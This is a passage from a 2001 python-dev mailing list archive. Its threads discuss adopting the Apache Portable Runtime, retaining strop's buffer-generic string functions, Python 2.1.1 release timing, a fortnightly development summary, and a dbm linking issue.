> but they didn't work for me.  Is it time to try again?  In certain
> circles IPv6 support in Python would be enough to switch programming
> languages... :-)

Radical suggestion:

  Toss out a ton of the platform-specific stuff in Python and use the Apache
  Portable Runtime (APR). It has IPv6 in it, but it could also help with
  loading shared libraries, threading, mmap'd files, sockets, etc.

(it won't replace *all* of Python's platform specific stuff; I think Python
 has more coverage than APR does)

Could simplify a number of things for Python, and reduce some of the
maintenance costs...

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From thomas at xs4all.net  Thu May 24 11:01:52 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 24 May 2001 11:01:52 +0200
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <m3u22bjiz6.fsf@atrus.jesus.cam.ac.uk>; from mwh@python.net on Thu, May 24, 2001 at 08:37:17AM +0100
References: <20010523160025.B690@xs4all.nl> <m3u22bjiz6.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <20010524110152.Q676@xs4all.nl>

[ Answer CC'd to python-dev since it deserves an official answer :) ]

On Thu, May 24, 2001 at 08:37:17AM +0100, Michael Hudson wrote:
> For summarasing purposes, do you have any idea when Python 2.1.1 will
> be released?

> "No" is a perfectly acceptable answer.

Then "No" it is ! Even though I have a fair bit of patches in the queue
right now, I need some more time to check out (no pun intended) the changes
since the fork, and I want to browse the bug list for possible bugs that
should be checked out and fixed for 2.1.1. Another couple of weeks at least,
before a release candidate. It also depends on Moshe; if he actually
releases 2.0.1 anytime soon, I'll hold off on 2.1.1 a bit longer.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal at lemburg.com  Thu May 24 12:18:50 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 24 May 2001 12:18:50 +0200
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org>
Message-ID: <3B0CE00A.488C8D73@lemburg.com>

Greg Stein wrote:
> 
> On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote:
> > Update of /cvsroot/python/python/dist/src/Modules
> > In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules
> >
> > Modified Files:
> >       stropmodule.c
> > Log Message:
> > Add warnings to the strop module, for to those functions that really
> > *are* obsolete; three variables and the maketrans() function are not
> > (yet) obsolete.
> >
> > Add a compensating warnings.filterwarnings() call to test_strop.py.
> >
> > Add this to the NEWS.
> 
> Something that I ran into the other day...
> 
> >>> ob = some_object_implementing_the_buffer_interface
> >>> string.find(ob, '.')
> (fails because ob does not define the .find method)
> >>> strop.find(ob, '.')
> (succeeds)
> 
> The point is that strop uses the t# to get a ptr/len pair to do its work.
> Thus, it can work on many things that export the buffer interface. Dropping
> strop means we no longer have many of those functions. Instead, the
> functionality must be copied to *every* object that implements the buffer
> interface.
> 
> We can say ob.find() now, but we can't say find(ob) any longer. And saying
> that all objects (which implement the buffer API) must now implement a bunch
> of "standard" methods is awfully burdensome.
> 
> In my particular case, I was trying to do a find on a BufferObject referring
> to a subset of another object. Blam. No good. Thankfully, when I did a
> find() on a mmap object, it worked simply because mmaps happen to define a
> .find method.
> 
> [ of course, the find method on an mmap was totally broken, but I checked in
>   a fix for that (last week or so) ]
> 
> So... my question is: is there any way that we can retain a generic find()
> (and similar functions from the string/strop module) that operates on any
> type that implements the buffer API?
> 
> Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
> implements some standard methods for 8-bit character data (using the buffer
> API), which can be mixed into new Python types" That would reduce the burden
> for new types.

I suppose that in 2.2 we'll be able to build a class/type
hierarchy which then provides these possibilities. I haven't
followed Guido's latest checkins closely though -- could be that
types don't support multiple inheritence.

BTW, wouldn't it suffice to add these methods to buffer objects ?
Then you could write: buffer(ob).find('.').

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From barry at digicool.com  Thu May 24 13:50:34 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 24 May 2001 07:50:34 -0400
Subject: [Python-Dev] IPv6
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
	<20010524015258.Z5402@lyra.org>
Message-ID: <15116.62858.720241.46017@anthem.wooz.org>

>>>>> "GS" == Greg Stein <gstein at lyra.org> writes:

    GS>   Toss out a ton of the platform-specific stuff in Python and
    GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but
    GS> it could also help with loading shared libraries, threading,
    GS> mmap'd files, sockets, etc.

I don't know squat about APR, but would it have to be either-or?  IOW,
would it be possible to wrap the APR in a module (or package) and
provide it as an importable alternative?

-Barry


From mal at lemburg.com  Thu May 24 14:22:42 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 24 May 2001 14:22:42 +0200
Subject: [Python-Dev] IPv6
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
		<20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org>
Message-ID: <3B0CFD12.164271D8@lemburg.com>

"Barry A. Warsaw" wrote:
> 
> >>>>> "GS" == Greg Stein <gstein at lyra.org> writes:
> 
>     GS>   Toss out a ton of the platform-specific stuff in Python and
>     GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but
>     GS> it could also help with loading shared libraries, threading,
>     GS> mmap'd files, sockets, etc.
> 
> I don't know squat about APR, but would it have to be either-or?  IOW,
> would it be possible to wrap the APR in a module (or package) and
> provide it as an importable alternative?

Should be possible; the problem is: how do you get the APR types
to interact with the original Python ones (e.g. file types). Many
low-level Python functions require the native Python types, so
while wrapping APR as Python module would provide an alternative, that
alternative will most probably not help much w/r to simplifying
portability issues.

FYI, here's what the APR has to offer (taken from the APRDesign
file that comes with Apache 2.0 beta):
"""
The base types in APR
file_io     File I/O, including pipes
lib         A portable library originally used in Apache.  This contains
            memory management, tables, and arrays.
locks       Mutex and reader/writer locks
misc        Any APR type which doesn't have any other place to belong
network_io  Network I/O
shmem       Shared Memory (Not currently implemented)   
signal      Asynchronous Signals
threadproc  Threads and Processes
time        Time 
"""

It currently supports: Unix (includes BeOS), Win32 and OS/2.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From gstein at lyra.org  Thu May 24 14:55:55 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 05:55:55 -0700
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <3B0CFD12.164271D8@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 02:22:42PM +0200
References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org> <3B0CFD12.164271D8@lemburg.com>
Message-ID: <20010524055555.B5402@lyra.org>

On Thu, May 24, 2001 at 02:22:42PM +0200, M.-A. Lemburg wrote:
> "Barry A. Warsaw" wrote:
> > >>>>> "GS" == Greg Stein <gstein at lyra.org> writes:
> > 
> >     GS>   Toss out a ton of the platform-specific stuff in Python and
> >     GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but
> >     GS> it could also help with loading shared libraries, threading,
> >     GS> mmap'd files, sockets, etc.
> > 
> > I don't know squat about APR, but would it have to be either-or?  IOW,
> > would it be possible to wrap the APR in a module (or package) and
> > provide it as an importable alternative?

Sure, that is a possibility, but it doesn't save Python much in terms of
maintenance or portability. "Just another library"

Truly using it could certainly be done as a slow migration, and it is
definitely possible to only use portions, subsets, etc. Another alternative
would be to use APR as a "platform target". But that just adds yet another
platform to support rather than simplifying.

> Should be possible; the problem is: how do you get the APR types
> to interact with the original Python ones (e.g. file types). Many

The header is a total misnomer, but "apr_portable.h" provides access to an
opaque type's underlying native object (many of us aren't sure how Ryan
arrived at "portable" being the name for the least-portable aspect of the
library :-). Anyways... you can extract a file descriptor from a file or
socket or pipe. Or a thread ID from an thread object. etc.

> low-level Python functions require the native Python types, so
> while wrapping APR as Python module would provide an alternative, that
> alternative will most probably not help much w/r to simplifying
> portability issues.

Right. I'd say use the APR functions unless absolute speed is required (such
as the readlines stuff). But you could also argue that the hard-core
platform specific optimizations could go into APR itself, so that Python
doesn't have to worry about them.

> FYI, here's what the APR has to offer (taken from the APRDesign
> file that comes with Apache 2.0 beta):
> """
> The base types in APR
> file_io     File I/O, including pipes
> lib         A portable library originally used in Apache.  This contains
>             memory management, tables, and arrays.
> locks       Mutex and reader/writer locks
> misc        Any APR type which doesn't have any other place to belong
> network_io  Network I/O
> shmem       Shared Memory (Not currently implemented)   
> signal      Asynchronous Signals
> threadproc  Threads and Processes
> time        Time 
> """

That doc is out of date; the list is missing: shared library handling, i18n,
mmap, user information access (e.g. getpwnam), uuid handling, getopt
replacements, cryptographic random data, and a few other bits here and
there. The shared mem actually is implemented mostly, via the libmm library.

And note that some of those topics have some nice depth. As I mentioned,
network_io supports IPv6, but also portable name lookups, sendfile(), etc.
The file_io stuff support optimized stat() and opendir-type calls for the
platform.

> It currently supports: Unix (includes BeOS), Win32 and OS/2.

A lot more than that :-)  Pretty much all the Unix variants, including
OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. 

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From gstein at lyra.org  Thu May 24 15:00:16 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 06:00:16 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0CE00A.488C8D73@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 12:18:50PM +0200
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com>
Message-ID: <20010524060016.D5402@lyra.org>

On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote:
> Greg Stein wrote:
>...
> > So... my question is: is there any way that we can retain a generic find()
> > (and similar functions from the string/strop module) that operates on any
> > type that implements the buffer API?
> > 
> > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
> > implements some standard methods for 8-bit character data (using the buffer
> > API), which can be mixed into new Python types" That would reduce the burden
> > for new types.
> 
> I suppose that in 2.2 we'll be able to build a class/type
> hierarchy which then provides these possibilities. I haven't
> followed Guido's latest checkins closely though -- could be that
> types don't support multiple inheritence.

No idea either... that's why I asked.

> BTW, wouldn't it suffice to add these methods to buffer objects ?
> Then you could write: buffer(ob).find('.').

You're totally missing the point with that suggestion. It does *not* suffice
to add them to buffer objects. What about array objects? mmap objects?
Random Joe Object who implements the buffer interface?

All of those are out of luck.

With strop, I can pass any of those objects to strop.find(). That function
has a polymorphic argument.

In the current arrangement, every object must implement their own .find and
.upper and .whatever.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From mwh at python.net  Thu May 24 15:02:34 2001
From: mwh at python.net (Michael Hudson)
Date: Thu, 24 May 2001 14:02:34 +0100 (BST)
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <20010524055555.B5402@lyra.org>
Message-ID: <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>

I can't think of a good way of expressing this, but I don't think we
should try to make writing non cross-platform code in Python impossible.
Yes, it should be easy to write x-platform code, but if there's some very
specific platform trick I can do with, say, setsockopt, I don't want
Python to hide it from me just 'cause it doesn't work on VMS.

Maybe this isn't an issue here.

On Thu, 24 May 2001, Greg Stein wrote:
[...]
> That doc is out of date; the list is missing: shared library handling, i18n,
> mmap, user information access (e.g. getpwnam), uuid handling, getopt
> replacements, cryptographic random data, and a few other bits here and
> there. The shared mem actually is implemented mostly, via the libmm library.

How big is APR?  How stable?  (in terms of interface; I'm assuming it
doesn't crap out through bad programming or it'd be a non-starter)

> And note that some of those topics have some nice depth. As I mentioned,
> network_io supports IPv6, but also portable name lookups, sendfile(), etc.
> The file_io stuff support optimized stat() and opendir-type calls for the
> platform.
>
> > It currently supports: Unix (includes BeOS), Win32 and OS/2.
>
> A lot more than that :-)  Pretty much all the Unix variants, including
> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.

That's still less than Python isn't it?  RiscOS, Amiga, PalmOS, VMS,
Playstation 2(!), from looking at
http://www.python.org/download/download_other.html.

Cheers,
M.


From gstein at lyra.org  Thu May 24 15:59:21 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 06:59:21 -0700
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>; from mwh@python.net on Thu, May 24, 2001 at 02:02:34PM +0100
References: <20010524055555.B5402@lyra.org> <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>
Message-ID: <20010524065921.E5402@lyra.org>

On Thu, May 24, 2001 at 02:02:34PM +0100, Michael Hudson wrote:
> I can't think of a good way of expressing this, but I don't think we
> should try to make writing non cross-platform code in Python impossible.

I don't think this would preclude writing non cross-platform code. As I
mentioned, there isn't anything that would prevent the stuff from working
side by side.

The idea is to simplify certain aspects of Python's platform specific stuff.
For example: all those variants of dynamically loading shared modules
(Python/dynload_*.c) can be tossed along with the config magic.

> Yes, it should be easy to write x-platform code, but if there's some very
> specific platform trick I can do with, say, setsockopt, I don't want
> Python to hide it from me just 'cause it doesn't work on VMS.

APR isn't a least common denominator approach.

>...
> > That doc is out of date; the list is missing: shared library handling, i18n,
> > mmap, user information access (e.g. getpwnam), uuid handling, getopt
> > replacements, cryptographic random data, and a few other bits here and
> > there. The shared mem actually is implemented mostly, via the libmm library.
> 
> How big is APR?

That's relative :-)  On my Linux box, a stripped library is 85k.

It is also (theoretically) possible to skip building portions of APR. The
APIs and symbols are set up for that, but the autoconf setup isn't yet. If
you're embedding a private APR build, then you can fine tune what is needed.
However, if you're building a public/shared one, then you wouldn't really
want to trim it back like that.

> How stable?

The existing functionality is quite stable. We just keep adding more, though
:-)

> (in terms of interface; I'm assuming it
> doesn't crap out through bad programming or it'd be a non-starter)

hehe... you can call it a non-starter, then. APR assumes you pass it valid
pointers and objects. For example, if you call apr_file_read(NULL, NULL,
100), then you'll get a segfault rather than EINVAL. Personally, I find that
behavior quite fine (EINVAL will invariably get ignored; a segfault doesn't;
and this is a programmer error that needs to be attended to -- throw it in
his face)

Whether others think that is a non-starter... hard to know :-)

[ actually, one of the hardest things to integrate would be APR's memory
  management approach with Python's ]

> > And note that some of those topics have some nice depth. As I mentioned,
> > network_io supports IPv6, but also portable name lookups, sendfile(), etc.
> > The file_io stuff support optimized stat() and opendir-type calls for the
> > platform.
> >
> > > It currently supports: Unix (includes BeOS), Win32 and OS/2.
> >
> > A lot more than that :-)  Pretty much all the Unix variants, including
> > OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.
> 
> That's still less than Python isn't it?  RiscOS, Amiga, PalmOS, VMS,
> Playstation 2(!), from looking at
> http://www.python.org/download/download_other.html.

Sure it's smaller.

It's a blue sky radical suggestion. No more, no less. :-) I mentioned it
because the IPv6 stuff came up. I already know a codebase that has handled
all the portability issues. That is a bonus :-)

However, for the platforms that APR *does* handle today, that would still be
a big code reduction for Python. And in the future? Why not extend APR to
those other platforms and reduce the Python code even more.


I think shifting Python to a portability library is actually quite an
interesting thought experiment. Enough to mention it and get people
thinking. I think it could be quite handy for the longer term
maintainability.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From mal at lemburg.com  Thu May 24 16:54:24 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 24 May 2001 16:54:24 +0200
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org>
Message-ID: <3B0D20A0.3C881F89@lemburg.com>

Greg Stein wrote:
> 
> On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote:
> > Greg Stein wrote:
> >...
> > > So... my question is: is there any way that we can retain a generic find()
> > > (and similar functions from the string/strop module) that operates on any
> > > type that implements the buffer API?
> > >
> > > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
> > > implements some standard methods for 8-bit character data (using the buffer
> > > API), which can be mixed into new Python types" That would reduce the burden
> > > for new types.
> >
> > I suppose that in 2.2 we'll be able to build a class/type
> > hierarchy which then provides these possibilities. I haven't
> > followed Guido's latest checkins closely though -- could be that
> > types don't support multiple inheritence.
> 
> No idea either... that's why I asked.
> 
> > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > Then you could write: buffer(ob).find('.').
> 
> You're totally missing the point with that suggestion. It does *not* suffice
> to add them to buffer objects. What about array objects? mmap objects?
> Random Joe Object who implements the buffer interface?

That's the point: you can wrap all those into a buffer object
and then use the buffer object methods to manipulate them. In
that sense, buffer objects provide an adaptor to the underlying
object which implements the needed methods.
 
> All of those are out of luck.
> 
> With strop, I can pass any of those objects to strop.find(). That function
> has a polymorphic argument.
> 
> In the current arrangement, every object must implement their own .find and
> .upper and .whatever.
> 
> Cheers,
> -g
> 
> --
> Greg Stein, http://www.lyra.org/

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From skip at pobox.com  Thu May 24 17:55:23 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 24 May 2001 10:55:23 -0500
Subject: [Python-Dev] strop vs. string
In-Reply-To: <20010524060016.D5402@lyra.org>
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net>
	<20010524013349.Y5402@lyra.org>
	<3B0CE00A.488C8D73@lemburg.com>
	<20010524060016.D5402@lyra.org>
Message-ID: <15117.12011.323759.496982@beluga.mojam.com>

    Greg> With strop, I can pass any of those objects to strop.find(). That
    Greg> function has a polymorphic argument.

Where doesn't strop compile/run?  If it works everywhere, either just rename
it to be the string module (copying any bits from the existing string module
that it doesn't yet have) or rename it something like buffer_funcs.

Skip


From skip at pobox.com  Thu May 24 17:58:24 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 24 May 2001 10:58:24 -0500
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>
References: <20010524055555.B5402@lyra.org>
	<Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>
Message-ID: <15117.12192.114564.111578@beluga.mojam.com>

    >> > It currently supports: Unix (includes BeOS), Win32 and OS/2.
    >> 
    >> A lot more than that :-) Pretty much all the Unix variants, including
    >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.

    Michael> That's still less than Python isn't it?  RiscOS, Amiga, PalmOS,
    Michael> VMS, Playstation 2(!),

Not to mention MacOS < X... ;-)

Skip


From mwh at python.net  Thu May 24 18:38:37 2001
From: mwh at python.net (Michael Hudson)
Date: Thu, 24 May 2001 17:38:37 +0100 (BST)
Subject: [Python-Dev] python-dev summary 2001-05-10 - 2001-05-24
Message-ID: <Pine.LNX.4.30.0105241737010.21946-100000@localhost.localdomain>

 This is a summary of traffic on the python-dev mailing list between
 May 10 and May 24 (inclusive) 2001.  It is intended to inform the
 wider Python community of ongoing developments.  To comment, just
 post to python-list at python.org or comp.lang.python in the usual
 way. Give your posting a meaningful subject line, and if it's about a
 PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep
 iteration) All python-dev members are interested in seeing ideas
 discussed by the community, so don't hesitate to take a stance on a
 PEP if you have an opinion.

 This is the eighth summary written by Michael Hudson.
 Summaries are archived at:

  <http://starship.python.net/crew/mwh/summaries/>

   Posting distribution (with apologies to mbm)

   Number of articles in summary: 322

       |                         [|]
       |                         [|]
    30 |                         [|]
       |                     [|] [|] [|]                     [|]
       |                     [|] [|] [|]                     [|]
       |                 [|] [|] [|] [|]                     [|]
       |                 [|] [|] [|] [|]                     [|]
       |     [|]         [|] [|] [|] [|] [|]                 [|]
    20 | [|] [|]         [|] [|] [|] [|] [|]                 [|]
       | [|] [|]         [|] [|] [|] [|] [|]             [|] [|]
       | [|] [|]     [|] [|] [|] [|] [|] [|]         [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]         [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
    10 | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|]
     0 +-023-025-017-018-028-031-036-032-025-002-015-018-020-032
        Thu 10| Sat 12| Mon 14| Wed 16| Fri 18| Sun 20| Tue 22|
            Fri 11  Sun 13  Tue 15  Thu 17  Sat 19  Mon 21  Wed 23

 Pretty busy fortnight.  The above distribution may be somewhat skewed
 because I changed my subscription address to python-dev and was
 unsubscribed for a while.  Although any impact this had is probably
 countered by ESR and Barry's discussion of "Puffy the Frog"...


    * Type/class *

 Paul Prescod has been keeping an eye on Guido's descr-branch work,
 and posted concerns about when objects will have a __dict__:

  <http://mail.python.org/pipermail/python-dev/2001-May/014694.html>

 Then there was more technical discussion about subclassing builtin
 types and Steven Majewski evangelising prototype-based OO languages
 (though I'm not sure why!).


    * Easy codec access *

 Marc-Andre Lemburg checked in his decode string method patch, and
 some new codecs so you can now do things like:

    >>> "abc".encode('zlib').encode('base64')
    'eJxLTEoGAAJNASc=\n'
    >>> _.decode('base64').decode('zlib')
    'abc'

 There was a small discussion on what other codecs might be handy and
 Guido added quoted-printable to check it was easy.


    * Performance *

 The big discussion(s) on python-dev over the past fourteen days has
 centred on performance, especially on that of comparisons and the
 related area of dict performance.  It all started with Tim Peters
 running a simple test program on 2.0, 2.1 and current CVS:

  <http://mail.python.org/pipermail/python-dev/2001-May/014781.html>

 The discussion had an unusual <wink> flavour for one about
 performance: a concentration on measuring performance numbers and
 making sure that the optimizations being discussed actually improved
 these numbers.  This is hard; everyone wants to speed the "typical
 Python app" but of course there is no such thing; people have been
 using, amongst others, pystone, pybench and the test suite, none of
 which are particularly good candidates...

 Tim posted the distribution of sizes of dicts in a run of the test
 suite:

  <http://mail.python.org/pipermail/python-dev/2001-May/014890.html>

 which showed that small dicts are overwhelmingly the commonest.  Marc
 piped up with an old optimization idea of his:

  <http://mail.python.org/pipermail/python-dev/2001-May/014891.html>

 He posted a patch to sourceforge, Tim rewrote it and checked it in,
 so dicts should be a little faster in 2.2.

 But as I said, the discussion was kicked off by the performance of
 comparisons, especially strings.  Martin von Loewis posted some
 statistics from an instrumented interpreter:

  <http://mail.python.org/pipermail/python-dev/2001-May/014808.html>

 The issue is that the rich comparisons of Python 2.1 have added a
 layer of complexity to the comparisons code.  Although the rich
 comparisons (might) provide an opportunity for faster code in some
 circumstances, code that still uses old-style comparisons can and
 does take a hit.  Strings still use the old-style comparisons and are
 compared a *lot* (especially in dicts), so it seems "upgrading" them
 to rich comparisons should be a win and Marc posted a patch to sf
 that does this.

 Marc also managed to promise <wink> to make a concerted effort to
 find speed optimizations in the next few months:

  <http://mail.python.org/pipermail/python-dev/2001-May/014928.html>

 Finally, in a coda Jeremy noticed that Python spends an alarming
 amount of time decoding those "Oi|s#" strings that get passed to
 PyArg_ParseTuple:

  <http://mail.python.org/pipermail/python-dev/2001-May/014911.html>

 and Tim pointed out that optimizing "O" might be a win:

  <http://mail.python.org/pipermail/python-dev/2001-May/014924.html>

    * FP vs. tutorial *

 Tim pointed out that the tutorial currently contains examples of
 floating point output that is platform dependent, and that this is
 bad.  He proposed changing the tutorial to only use fractions that
 can be exactly represented as floats, and adding a discussion
 (possibly in an appendix) of the reasons why

    >>> 0.1
    0.10000000000000001

 is not broken.  There was a discussion of how detailed the discussion
 should be where the point was made that it's not really important to
 explain precisely *why* this happens, but it suffices to convince the
 newbie that floating point is more complicated than he or she thinks.
 Lets hope that suitable text is composed soon, and that people
 actually read it ... there have been two "floating point is broken"
 bug reports on sourceforge in just the last week.


    * unifying os.rename semantics across platforms *

 Skip pointed out that os.rename behaves differently on Posix and
 Windows platforms when the destination file exists:

  <http://mail.python.org/pipermail/python-dev/2001-May/014957.html>

 on Posix the destination is silently replaced in an atomic operation,
 whereas on Windows an exception is raised.  Skip proposed enforcing
 posix semantics everywhere, but this has two problems (a) it's
 backwards incompatible (b) it's impossible (you can't avoid the race
 condition on Windows).  So maybe we'll just settle for better
 documentation.


    * Python 2.1.1 *

 Thomas Wouters started back-porting bug fixes to the 2,1-maint branch
 in preparation for a 2.1.1 release.  There is as yet no firm - or
 even vague - plans about release dates.


    * Daily Python-URL on your Palm *

 Marc-Andre Lemburg announced that you can now read Pythonware's Daily
 Python-URL on your Palm Pilot as an AvantGo channel:

  <http://mail.python.org/pipermail/python-dev/2001-May/014983.html>

Cheers,
M.


From gstein at lyra.org  Thu May 24 21:45:18 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 12:45:18 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0D20A0.3C881F89@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 04:54:24PM +0200
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com>
Message-ID: <20010524124518.N5402@lyra.org>

On Thu, May 24, 2001 at 04:54:24PM +0200, M.-A. Lemburg wrote:
>...
> That's the point: you can wrap all those into a buffer object
> and then use the buffer object methods to manipulate them. In
> that sense, buffer objects provide an adaptor to the underlying
> object which implements the needed methods.

That would certainly be a valid solution. And at the C level, we could share
functions between PyBufferObject and PyStringObject.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From gstein at lyra.org  Thu May 24 22:07:43 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 13:07:43 -0700
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <15117.12192.114564.111578@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 10:58:24AM -0500
References: <20010524055555.B5402@lyra.org> <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain> <15117.12192.114564.111578@beluga.mojam.com>
Message-ID: <20010524130743.O5402@lyra.org>

On Thu, May 24, 2001 at 10:58:24AM -0500, skip at pobox.com wrote:
> 
>     >> > It currently supports: Unix (includes BeOS), Win32 and OS/2.
>     >> 
>     >> A lot more than that :-) Pretty much all the Unix variants, including
>     >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.
> 
>     Michael> That's still less than Python isn't it?  RiscOS, Amiga, PalmOS,
>     Michael> VMS, Playstation 2(!),
> 
> Not to mention MacOS < X... ;-)

As I mentioned, MacOS X is already there. MacOS Classic is not.

But the presence of a portability library such as APR does not exclude the
use of direct platform hooks where/when necessary. For a bunch of stuff, you
use APR [to reduce complexity/maintenance]. For the rest, you go native just
like today.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From skip at pobox.com  Thu May 24 23:15:48 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 24 May 2001 16:15:48 -0500
Subject: [Python-Dev] Odd message from test_dbm
Message-ID: <15117.31236.804746.160037@beluga.mojam.com>

I just noticed this message when running make test:

    test test_dbm skipped --  /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey

I'm running a vanilla Mandrake 8.0 system.  Unfortunately, I can't check
libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip
them...

Anybody else seen this?  

Skip


From thomas at xs4all.net  Thu May 24 23:42:58 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 24 May 2001 23:42:58 +0200
Subject: [Python-Dev] Odd message from test_dbm
In-Reply-To: <15117.31236.804746.160037@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 04:15:48PM -0500
References: <15117.31236.804746.160037@beluga.mojam.com>
Message-ID: <20010524234258.I690@xs4all.nl>

On Thu, May 24, 2001 at 04:15:48PM -0500, skip at pobox.com wrote:

> I just noticed this message when running make test:

>     test test_dbm skipped --  /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey

> I'm running a vanilla Mandrake 8.0 system.  Unfortunately, I can't check
> libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip
> them...

The problem is that the dbmmodule isn't linked to the right library. Debian
has a similar (if not the same) problem. setup.py doesn't try hard enough to
figure out the right library to link with; it checks for libndbm, but not
libdbm or libgdbm (it assumes DBM support is in libc if not in libndbm.)
I *think* all it needs to do is check for libdbm as well as libndbm, but
this might pick up old/incompatible libraries on some platforms, and it
might still require fiddling of include paths on others. I seem to recall
you had to include either /usr/include/db1/ndbm.h (to use libdbm) or
/usr/include/gdbm/ndbm.h or /usr/include/gdbm-ndbm.h (to use gdbm's ndbm
'emulation') but I gave up in frustration trying to figure out the
difference :P

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From greg at cosc.canterbury.ac.nz  Fri May 25 04:45:01 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 25 May 2001 14:45:01 +1200 (NZST)
